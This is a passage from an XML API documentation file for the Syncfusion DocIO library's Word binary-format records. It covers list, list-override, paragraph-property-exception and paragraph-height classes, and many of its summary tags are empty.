            <param name="operand"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.LineSpacingDescriptor.Save">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.LineSpacingDescriptor.LineSpacing">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.LineSpacingDescriptor.LineSpacingRule">
            <summary>
            
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.ListData">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.ListData.m_lsid">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.ListData.#ctor(System.Int32)">
            <summary>
            
            </summary>
            <param name="lsid"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.ListData.#ctor(System.Int32,System.Boolean,System.Boolean)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.ListData"/> class.
            </summary>
            <param name="lsid">The lsid.</param>
            <param name="isHybrid">if it is hybrid, set to <c>true</c>.</param>
            <param name="isSimpleList">if it is simple list, set to <c>true</c>.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.ListData.#ctor(System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="reader"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.ListData.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.ListData.ReadLvl(System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="stream"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.ListData.WriteListData(System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="stream"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.ListData.ReadListData(System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="stream"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.ListData.WriteLvl(System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="stream"></param>
            <param name="memConvertor"></param>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ListData.Levels">
            <summary>
            Gets ListLevels object
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ListData.Name">
            <summary>
            Gets/sets list name
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ListData.RestartHeading">
            <summary>
            True if restart heading
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ListData.SimpleList">
            <summary>
            True if it is simplelist
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ListData.IsHybridMultilevel">
            <summary>
            Gets a value indicating whether this instance is hybrid multilevel.
            </summary>
            <value>
            	if this instance is hybrid multilevel, set to <c>true</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ListData.ListID">
            <summary>
            Gets/sets list identifier.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.ListFormatOverride">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.ListFormatOverride.m_lsid">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.ListFormatOverride.#ctor">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.ListFormatOverride.#ctor(System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="stream"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.ListFormatOverride.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.ListFormatOverride.WriteLfo(System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="stream"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.ListFormatOverride.ReadLfo(System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="stream"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.ListFormatOverride.WriteLfoLvls(System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="stream"></param>
            <param name="memConvertor"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.ListFormatOverride.ReadLfoLvls(System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="stream"></param>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ListFormatOverride.Levels">
            <summary>
            Gets arraylist of ListFormatOverrride levels
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ListFormatOverride.ListID">
            <summary>
            Gets/sets list identifier.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.ListFormatOverrideLevel">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.ListFormatOverrideLevel.m_startAt">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.ListFormatOverrideLevel.m_lvl">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.ListFormatOverrideLevel.#ctor(System.Boolean)">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.ListFormatOverrideLevel.#ctor(System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="stream"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.ListFormatOverrideLevel.Write(System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="stream"></param>
            <param name="memConvertor"></param>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.ListFormatOverrides">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.ListFormatOverrides.#ctor">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.ListFormatOverrides"/> class.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ListFormatOverrides.Item(System.Int32)">
            <summary>
            
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.ListFormats">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.ListFormats.#ctor">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.ListFormats"/> class.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.ListFormats.GetListFromId(System.Int32)">
            <summary>
            
            </summary>
            <param name="id"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.ListFormats.FindListData(System.Int32)">
            <summary>
            
            </summary>
            <param name="listId"></param>
            <returns></returns>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ListFormats.Item(System.Int32)">
            <summary>
            
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.ListInfo">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.ListInfo.DEF_LIST_ID">
            <summary>
            Default list id
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.ListInfo.DEF_BULLLET_FIRST">
            <summary>
            Strings for bulleted lists
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.ListInfo.DEF_MULTIPLIER">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.ListInfo.m_listid">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.ListInfo.#ctor">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.ListInfo.#ctor(Syncfusion.DocIO.ReaderWriter.Fib,System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="fib"></param>
            <param name="stream"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.ListInfo.ReadLst(Syncfusion.DocIO.ReaderWriter.Fib,System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="fib"></param>
            <param name="stream"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.ListInfo.ReadLfo(Syncfusion.DocIO.ReaderWriter.Fib,System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="fib"></param>
            <param name="stream"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.ListInfo.ReadStringTable(Syncfusion.DocIO.ReaderWriter.Fib,System.IO.Stream)">
            <summary>
            Reads lists' names
            </summary>
            <param name="fib"></param>
            <param name="stream"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.ListInfo.WriteLfo(System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="stream"></param>
            <param name="memConvertor"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.ListInfo.WriteLst(System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="stream"></param>
            <param name="memConvertor"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.ListInfo.WriteStringTable(System.IO.Stream)">
            <summary>
            Writes lists' names
            </summary>
            <param name="stream"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.ListInfo.ApplyNumberList">
            <summary>
            
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.ListInfo.GetLevelFormat(System.Int32)">
            <summary>
            
            </summary>
            <param name="levelNumber"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.ListInfo.Clone">
            <summary>
            
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.ListInfo.ApplyBulletList">
            <summary>
            
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.ListInfo.ApplyList(Syncfusion.DocIO.ReaderWriter.Biff_Records.ListData,Syncfusion.DocIO.DLS.WListFormat,Syncfusion.DocIO.ReaderWriter.WordStyleSheet)">
            <summary>
            
            </summary>
            <param name="listData"></param>
            <param name="listFormat"></param>
            <param name="styleSheet"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.ListInfo.ApplyLFO(Syncfusion.DocIO.ReaderWriter.Biff_Records.ListData,Syncfusion.DocIO.DLS.WListFormat,Syncfusion.DocIO.ReaderWriter.WordStyleSheet)">
            <summary>
            
            </summary>
            <param name="listData"></param>
            <param name="listFormat"></param>
            <param name="styleSheet"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.ListInfo.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.ListInfo.CreateBuletLvl(System.Int32,System.String)">
            <summary>
            
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.ListInfo.CreateNumberLvl(System.Int32,System.Int32,Syncfusion.DocIO.DLS.ListPatternType,Syncfusion.DocIO.DLS.ListNumberAlignment)">
            <summary>
            
            </summary>
            <param name="dxLeft"></param>
            <param name="levelNumber"></param>
            <param name="nfc"></param>
            <param name="align"></param>
            <returns></returns>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ListInfo.ListFormatOverrides">
            <summary>
            Gets ListFormatOverrides object
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ListInfo.ListFormats">
            <summary>
            Gets ListFormats object
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.ListLevel">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.ListLevel.m_startAt">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.ListLevel.m_str">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.ListLevel.#ctor">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.ListLevel.#ctor(System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="stream"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.ListLevel.Write(System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="stream"></param>
            <param name="memConvertor"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.ListLevel.Read(System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="stream"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.ListLevel.ReadListSprms(System.Int32,System.IO.Stream,System.Boolean)">
            <summary>
            Reads list's character or paragraph properties.
            </summary>
            <param name="dataLen"></param>
            <param name="stream"></param>
            <param name="isChpx"></param>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.ListLevels">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.ListLevels.#ctor">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.ListLevels"/> class.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ListLevels.Item(System.Int32)">
            <summary>
            
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.ListProperties">
            <summary>
            Summary description for ListFormat.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.ListProperties.m_listInfo">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.ListProperties.m_pap">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.ListProperties.m_currentListIndex">
            <summary>
            Index of current list
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.ListProperties.m_currentListLevel">
            <summary>
            Index of current list's level
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.ListProperties.m_overrideStyles">
            <summary>
            Key = override list style name, value = override list index.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.ListProperties.m_styles">
            <summary>
            Key = list style name, value = list index.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.ListProperties.#ctor(Syncfusion.DocIO.ReaderWriter.Biff_Records.ListInfo,Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphProperties)">
            <summary>
            
            </summary>
            <param name="listInfo"></param>
            <param name="pap"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.ListProperties.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.ListProperties.ApplyBulletList">
            <summary>
            Apply bulleting for current paragraph
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.ListProperties.ContinueCurrentList">
            <summary>
            Continues the current list.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.ListProperties.ApplyNumberList">
            <summary>
            Apply numbering for current paragraph
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.ListProperties.IncreaseIndent">
            <summary>
            Increase indent of current list paragraph
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.ListProperties.DecreaseIndent">
            <summary>
            Decrease indent of current list paragraph
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.ListProperties.RemoveList">
            <summary>
            Remove list from current paragraph
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.ListProperties.ContinueCurrentList(Syncfusion.DocIO.ReaderWriter.Biff_Records.ListData,Syncfusion.DocIO.DLS.WListFormat,Syncfusion.DocIO.ReaderWriter.WordStyleSheet)">
            <summary>
            Continue current list
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.ListProperties.ApplyList(Syncfusion.DocIO.ReaderWriter.Biff_Records.ListData,Syncfusion.DocIO.DLS.WListFormat,Syncfusion.DocIO.ReaderWriter.WordStyleSheet,System.Boolean)">
            <summary>
            Applies the list.
            </summary>
            <param name="listData">The list data.</param>
            <param name="listFormat">The list format.</param>
            <param name="styleSheet">The style sheet.</param>
            <param name="applyToPap">if it is apply to pap, set to <c>true</c>.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.ListProperties.ApplyBaseStyleList(Syncfusion.DocIO.ReaderWriter.Biff_Records.ListData,Syncfusion.DocIO.DLS.WListFormat,Syncfusion.DocIO.ReaderWriter.WordStyleSheet)">
            <summary>
            
            </summary>
            <param name="listData"></param>
            <param name="listFormat"></param>
            <param name="styleSheet"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.ListProperties.SetListLevelNumber(System.Byte,System.Boolean)">
            <summary>
            Set paragraph's list level index. 
            </summary>
            <param name="value"></param>
            <param name="isOutLineListStyle"></param>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ListProperties.ListLevelNumber">
            <summary>
            Gets/sets level of current list
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ListProperties.StyleListIndexes">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ListProperties.Pap">
            <summary>
            
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphExceptionInDiskPage">
            <summary>
            
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphPropertyException">
            <summary>
            Summary description for ParagraphPropertyException.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphPropertyException.m_usStyleId">
            <summary>
            Style id.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphPropertyException.m_arrSprms">
            <summary>
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphPropertyException.#ctor">
            <summary>
            Default constructor.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphPropertyException.#ctor(System.Byte[])">
            <summary>
            Creates new record from array of bytes, using specified memory provider.
            </summary>
            <param name="data">Data to parse.</param>
            <param name="converter">MemoryConverter to convert array of bytes into structure.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphPropertyException.#ctor(System.Byte[],System.Int32)">
            <summary>
            Creates new record from array of bytes, using specified memory provider.
            </summary>
            <param name="arrData">Data to parse.</param>
            <param name="iOffset">Offset to the class data.</param>
            <param name="converter">MemoryConverter to convert array of bytes into structure.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphPropertyException.#ctor(System.Byte[],System.Int32,System.Int32)">
            <summary>
            Creates new record from array of bytes, using specified memory provider.
            </summary>
            <param name="arrData">Data to parse.</param>
            <param name="iOffset">Offset to the class data.</param>
            <param name="iCount">Number of bytes for the new record.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphPropertyException.#ctor(System.IO.Stream,System.Int32,System.Boolean)">
            <summary>
            Creates new record from stream.
            </summary>
            <param name="stream">Stream with record's data.</param>
            <param name="iCount">Number of bytes to parse.</param>
            <param name="isHugePapx">if set to <c>true</c> [is huge papx].</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphPropertyException.#ctor(Syncfusion.DocIO.ReaderWriter.Biff_Records.UniversalPropertyException)">
            <summary>
            
            </summary>
            <param name="property"></param>
            <param name="converter"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphPropertyException.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphPropertyException.Parse(System.Byte[],System.Int32,System.Int32)">
            <summary>
            Parses record.
            </summary>
            <param name="arrData">Data to parse.</param>
            <param name="iOffset">Offset in the data array to the records data.</param>
            <param name="iCount">Number of bytes to parse.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphPropertyException.Save(System.IO.Stream)">
            <summary>
            Saves the specified stream.
            </summary>
            <param name="stream">The stream.</param>
            <returns>Number of bytes in the written data.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphPropertyException.SaveHugePapx(System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="stream"></param>
            <param name="converter"></param>
            <returns></returns>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphPropertyException.IsHugePapx">
            <summary>
            Gets or sets a value indicating whether [m_is huge papx].
            </summary>
            <value>
              <c>true</c> if [m_is huge papx]; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphPropertyException.StyleIndex">
            <summary>
            Gets / sets StyleId.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphPropertyException.PropertyModifiers">
            <summary>
            A list of the sprms (Single PRoperty modifier) that encode
            the differences between CHP (CHaracter property) for a run
            of text and the CHP generated by the paragraph and character
            styles that tag the run.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphPropertyException.ModifiersCount">
            <summary>
            Returns number of property modifiers. Read-only.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphPropertyException.Length">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphPropertyException.ParagraphStyleId">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphPropertyException.PageBreakBefore">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphExceptionInDiskPage.#ctor">
            <summary>
            Default constructor.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphExceptionInDiskPage.#ctor(Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphPropertyException)">
            <summary>
            Default constructor.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphExceptionInDiskPage.#ctor(System.Byte[],System.Int32)">
            <summary>
            Creates new instance of Paragraph Property Exception in Formatted Disk Page.
            </summary>
            <param name="arrData">Array that contains class data.</param>
            <param name="iOffset">Data offset in the data array.</param>
            <param name="converter"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphExceptionInDiskPage.Parse(System.Byte[],System.Int32)">
            <summary>
            Extracts structure from the array of bytes.
            </summary>
            <param name="arrData">Array of bytes with structure's data.</param>
            <param name="iOffset">Offset to the structure's data start.</param>
            <param name="converter"></param>
            <returns>Offset after structure's data end.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphExceptionInDiskPage.Save(System.Byte[],System.Int32)">
            <summary>
            Saves record into array of bytes.
            </summary>
            <param name="arrData">Array of bytes to save record into.</param>
            <param name="iOffset">Offset in the array.</param>
            <returns>Number of bytes in the written data.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphExceptionInDiskPage.Save(System.IO.BinaryWriter,System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="writer"></param>
            <param name="stream"></param>
            <returns></returns>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphExceptionInDiskPage.Length">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphExceptionInDiskPage.IsPad">
            <summary>
            
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphHeight">
            <summary>
            The PHE is a substructure of the PAP and the PAPX FKP
            and is also stored in the PLCFPHE.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphHeight.DEF_BIT_SPARE">
            <summary>
            Index of the bit of spare flag.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphHeight.DEF_BIT_VALID">
            <summary>
            Index of the bit of validness bit.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphHeight.DEF_BIT_DIFF_LINES">
            <summary>
            Index of the bit for IsDifferentLines property.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphHeight.DEF_BYTE_LINES_COUNT">
            <summary>
            Index of byte for lines count property.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphHeight.DEF_MASK_NEXT_ROW_HINT">
            <summary>
            Mask for NextRowHint property.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphHeight.DEF_START_NEXT_ROW_HINT">
            <summary>
            Start bit for NextRowHint property.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphHeight.DEF_RECORD_SIZE">
            <summary>
            Size of the record in bytes.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphHeight.m_structure">
            <summary>
            Underlying structure.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphHeight.#ctor">
            <summary>
            Default constructor.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphHeight.#ctor(System.Byte[])">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphHeight"/> class.
            </summary>
            <param name="arrData">The arr data.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphHeight.#ctor(System.IO.Stream)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphHeight"/> class.
            </summary>
            <param name="stream">The stream.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphHeight.Parse(System.Byte[],System.Int32)">
            <summary>
            Parses the specified data array.
            </summary>
            <param name="arrData">The data array.</param>
            <param name="iOffset">The offset.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphHeight.Save(System.Byte[],System.Int32)">
            <summary>
            Saves the structure.
            </summary>
            <param name="arrData">The destination data array.</param>
            <param name="iOffset">The offset.</param>
            <returns></returns>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphHeight.IsSpare">
            <summary>
            Reserved (fSpare).
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphHeight.IsValid">
            <summary>
            Indicates whether this structure is valid (fUnk).
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphHeight.IsDifferentLines">
            <summary>
            If this property is set to True then total height of paragraph is known
            but lines in paragraph have different heights (fDiffLines).
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphHeight.LinesCount">
            <summary>
            When fDiffLines is 0 is number of lines in paragraph (clMac).
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphHeight.Width">
            <summary>
            Width of lines in paragraph (dxaCol).
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphHeight.Height">
            <summary>
            when IsDiffLines is 0, is height of every line in paragraph in pixels
            when IsDiffLines is 1, is the total height in pixels of the paragraph
            
            If the PHE is stored in a PAP whose fTtp field is set (non-zero),
            height of table row (dymLine / dymHeight / dymTableHeight).
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphHeight.NextRowHint">
            <summary>
            If not == 0, used as a hint when finding the next row (dcpTtpNext).
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphHeight.UnderlyingStructure">
            <summary>
            Gets underlying structure. Read-only.
            </summary>
        </member>
